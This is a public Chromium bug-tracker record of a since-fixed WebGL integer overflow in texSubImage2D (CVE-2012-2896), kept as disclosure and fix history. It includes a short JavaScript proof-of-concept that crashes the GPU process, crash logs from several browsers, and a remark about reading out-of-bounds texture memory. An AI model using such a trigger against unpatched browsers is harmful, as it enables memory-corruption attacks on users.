New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Last visit 17 days ago
Closed: Dec 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Sign in to add a comment

Issue 145544: Security: integer overflow in gpu process with webgl

Reported by, Aug 29 2012

Issue description

integer overflow in gpu process with webgl

this might be an asan bug.

chromium and chrome say:
[] .WebGLRenderingContext: GL ERROR :GL_INVALID_VALUE : glTexSubImage2D: bad dimensions.

Chrome Version: dev
Operating System: linux 64bit

      var gl = document.createElement("canvas").getContext('experimental-webgl')
      var texture = gl.createTexture()
      gl.bindTexture(gl.TEXTURE_2D, texture)
      gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0, gl.RGBA, gl.UNSIGNED_BYTE, null)
      gl.texSubImage2D(gl.TEXTURE_2D, 0, 0, 0x7fffff00, 256, 256, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(256 * 256 * 4))

same problem with the large number in the x position.

Type of crash: asan + gpu
Crash State: 

==2978== ERROR: AddressSanitizer unknown-crash on address 0x8000e033f080 at pc 0x55555f2a4310 bp 0x7fffffff7550 sp 0x7fffffff7308
READ of size 1 at 0x8000e033f080 thread T0
    #0 0x55555f2a430f in __interceptor_memcpy ??:0
    #1 0x7fffe95934c6 in ?? ??:0
==2978== AddressSanitizer CHECK failed: /usr/local/google/chrome/src/third_party/llvm/projects/compiler-rt/lib/asan/ "((0 && "Address is not in memory and not in shadow?")) != (0)" (0x0, 0x0)
    #0 0x55555f2a923e in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) ??:0
    #1 0x55555f2a83a9 in __asan::DescribeAddressIfShadow(unsigned long) ??:0
443 bytes View Download
1.3 KB View Download

Comment 1 by, Aug 30 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Feature-GPU-WebGL OS-All Mstone-22 SecSeverity-High SecImpacts-Stable SecImpacts-Beta

Comment 2 by, Aug 30 2012

@kcc: ASAN bug or real?

Comment 3 by, Aug 31 2012

All I see now is a null deref, and asan is unable to unwind through it..

Comment 4 by, Aug 31 2012

Status: Assigned
The NULL deref is reproducible for me under Chrome built with just Clang (without ASan):

Here's the crashing thread stack:

0x7f12a3cc6fc1	 []	 + 0x00086fc1]	
0x7f129d6a06f5	 []	 + 0x010266f5]	
0x7f129d6aa7d9	 []	 + 0x010307d9]	
0x7f129d6a069f	 []	 + 0x0102669f]	
0x7f129d7afbcd	 []	 + 0x01135bcd]	
0x7f129d7a4bfa	 []	 + 0x0112abfa]	
0x7f1299db60f7	 [ (deleted)]	 + 0x000100f7]	
0x7f1299db60f7	 [ (deleted)]	 + 0x000100f7]	
0x7f1299db60f7	 [ (deleted)]	 + 0x000100f7]

Comment 5 by, Aug 31 2012

Ken is on vacation.  I'll take a look.

Comment 6 by, Sep 6 2012

Labels: ReleaseBlock-Stable

Comment 7 by, Sep 6 2012

Status: Started

Comment 8 by, Sep 6 2012

works on intel

==7710== ERROR: AddressSanitizer crashed on unknown address 0x7fffe31a5000 (pc 0x7fffe9a5afc2 sp 0x7fffffff74a0 bp 0x000000000400 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fffe9a5afc2 (/usr/lib/x86_64-linux-gnu/dri/
Stats: 37M malloced (35M for red zones) by 50451 calls

Comment 9 by, Sep 7 2012

This was a bug in the overflow math code

There's a CL here that fixes it

Comment 11 by, Sep 7 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
miaubiz, can you try on trunk so see if it fixes for you ?

Comment 12 by, Sep 8 2012

fixed in 155560 for me

Comment 13 by, Sep 8 2012

Labels: reward-topanel
@miaubiz: thanks. I'll get it merged for the upcoming Chrome 22 release.

We actually tracked this to a legitimate modern compiler optimization on tricky code. I wonder if other release compiles are affected? Win, Linux, ... if so, might be fun to try and read the OOB texture values via JS ;-) Rewards panel now loves that sort of thing.

Comment 14 by, Sep 10 2012

@scarybeasts: can you please elaborate on what you mean, by the legitimate modern compiler optimization, and by how to proceed checking more stuff

Comment 15 by, Sep 10 2012

@miaubiz: the problem is "signed arithmetic overflow behaviour" -- which is specifically undefined in the C standard. We had some code relying on it. Modern compilers will perform optimizations that break such code.

So, the clang / ASAN compiler you used to find this bug definitely has the optimization!

But what about Windows / MSVC? Does your test case reproduce on Windows?
How about a standard Linux build? That is compiled with GCC.

I think it'd be interesting, that's all :D

Comment 16 by, Sep 10 2012

I see.

/Applications/Google\\ Chrome --gpu-launcher="env CW_CURRENT_CASE=scarybeasts $HOME/crashwrangler/exc_handler" --incognito --disable-breakpad scarybeasts.html

Crashed thread log = 
: CrGpuMain  Dispatch queue:
0   libsystem_c.dylib             	0x951baa37 memmove$VARIANT$sse42 + 218
1   libGLImage.dylib              	0x98933e64 glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 106
2   libGLImage.dylib              	0x98932823 glgProcessPixelsWithProcessor + 991
3   GLEngine                      	0x05f1d1aa gleTextureImagePut + 1167
4   GLEngine                      	0x05dc56fe glTexSubImage2D_Exec + 1882
5   libGL.dylib                   	0x92068546 glTexSubImage2D + 87
6   	0x02679fe8 ChromeMain + 39718232

exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movdqa	%xmm0,(%edi,%edx):instruction_address=0x00000000951baa37:access_type=write:access_address=0x0000000007c0f000:

Comment 17 by, Sep 10 2012

meanwhile on Safari, requires manually setting 'Enable WebGL' tho.

Thread 0 Crashed:: Dispatch queue:
0   libsystem_c.dylib                   0x00007fff89385aa7 memmove$VARIANT$sse42 + 159
1   libGLImage.dylib                    0x00007fff86dc2acc glgCopyRowsWithMemCopy(GLGOperationRec const*, unsigned long, GLDPixelModeRec const*) + 129
2   libGLImage.dylib                    0x00007fff86dc1644 glgProcessPixelsWithProcessor + 885
3   GLEngine                            0x0000000150e6cf6d gleTextureImagePut + 1264
4   GLEngine                            0x0000000150d1bb7b glTexSubImage2D_Exec + 1720
5   libGL.dylib                         0x00007fff8e05d28a glTexSubImage2D + 77
6                   0x00007fff8506c583 WebCore::GraphicsContext3D::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, void const*) + 83
7                   0x00007fff858d83ea WebCore::WebGLRenderingContext::texSubImage2D(unsigned int, int, int, int, int, int, unsigned int, unsigned int, WTF::ArrayBufferView*, int&) + 426
8                   0x00007fff850599b2 WebCore::jsWebGLRenderingContextPrototypeFunctionTexSubImage2D(JSC::ExecState*) + 1602

Path:            /System/Library/PrivateFrameworks/WebKit2.framework/
Version:         8536 (8536.25)
OS Version:      Mac OS X 10.8.1 (12B19)

Comment 18 by, Sep 10 2012

Nice. GCC on Mac clearly affected.

Comment 19 by, Sep 10 2012

I thought we use Clang on Mac, not gcc

Comment 20 by, Sep 10 2012

Oh, possibly my bad. XCode switched to clang?

Comment 21 by, Sep 11 2012

>> XCode switched to clang?
Yep. (Long ago, I think)

Comment 22 by, Sep 11 2012

yeah. apple ditched gcc a while back.

osx has no gpu sandbox right?

Comment 23 by, Sep 11 2012

I think it does: content/common/

Comment 24 by, Sep 17 2012

Labels: -Merge-Approved Merge-Merged

Comment 26 by, Sep 25 2012

Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: nice job for starting fuzzing on your Mac. Seems to be a new source of revenue :D

Comment 27 by, Sep 27 2012

@scarybeasts: it says [Mac only] [$1000] [145544] High CVE-2012-2896: Integer overflow in WebGL. Credit to miaubiz.

this was on linux too (including intel) see c#0 and c#8

Comment 28 by, Sep 27 2012

I think you were seeing it on Linux because ASAN builds use the Clang compiler.
Production Linux builds use GCC. GCC has been known to apply the same optimization but I don't see any crash logs against production builds? So hard to say :)

Comment 29 by, Oct 11 2012

Labels: -reward-unpaid

Comment 30 by, Dec 20 2012

Status: Fixed

Comment 31 by, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -Feature-GPU-WebGL -Mstone-22 -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta Cr-Content Cr-Internals-GPU-WebGL Security-Impact-Stable Security-Impact-Beta M-22 Security-Severity-High Type-Bug-Security

Comment 32 by, Mar 21 2013

Labels: -Restrict-View-SecurityNotify

Comment 33 by, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 34 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 35 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 36 by, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 37 by, Apr 10 2013

Project Member
Labels: -Cr-Internals-GPU-WebGL Cr-Blink-WebGL

Comment 38 by, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 39 by, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 40 by, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 41 by, Oct 2 2016

Labels: allpublic

Sign in to add a comment